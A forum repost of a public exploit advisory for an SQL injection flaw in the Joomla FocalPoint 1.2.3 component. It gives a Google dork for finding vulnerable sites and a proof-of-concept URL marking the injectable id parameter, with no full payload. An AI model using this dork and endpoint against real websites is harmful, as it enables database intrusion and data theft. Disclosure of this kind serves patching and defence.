Jump to content
KhiZaRix

Joomla FocalPoint 1.2.3 SQL Injection

Recommended Posts

Posted

Joomla FocalPoint component version 1.2.3 suffers from a remote SQL injection vulnerability.

 

# Exploit Title: Joomla Component FocalPoint 1.2.3 - SQL Injection
# Date: 2017-03-23
# Home : https://extensions.joomla.org/extensions/extension/maps-a-weather/maps-a-locations/focalpoint/
# Exploit Author: Persian Hack Team
# Discovered by : Mojtaba MobhaM (kazemimojtaba@live.com)
# Home : http://persian-team.ir/
# Google Dork : inurl:index.php?option=com_focalpoint
# Telegram Channel AND Demo: @PersianHackTeam
# Tested on: WIN

# POC :

id Parameter Vulnerable to SQL Injection Put a String Value in id Parameter
http://www.target.com/index.php?option=com_focalpoint&view=location&id=[SQL]&Itemid=135

# Greetz : T3NZOG4N & FireKernel & Milad Hacking And All Persian Hack Team Members
# Iranian White Hat Hackers


Sursa/Source: https://packetstormsecurity.com/files/141793/Joomla-FocalPoint-1.2.3-SQL-Injection.html

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.



×
×
  • Create New...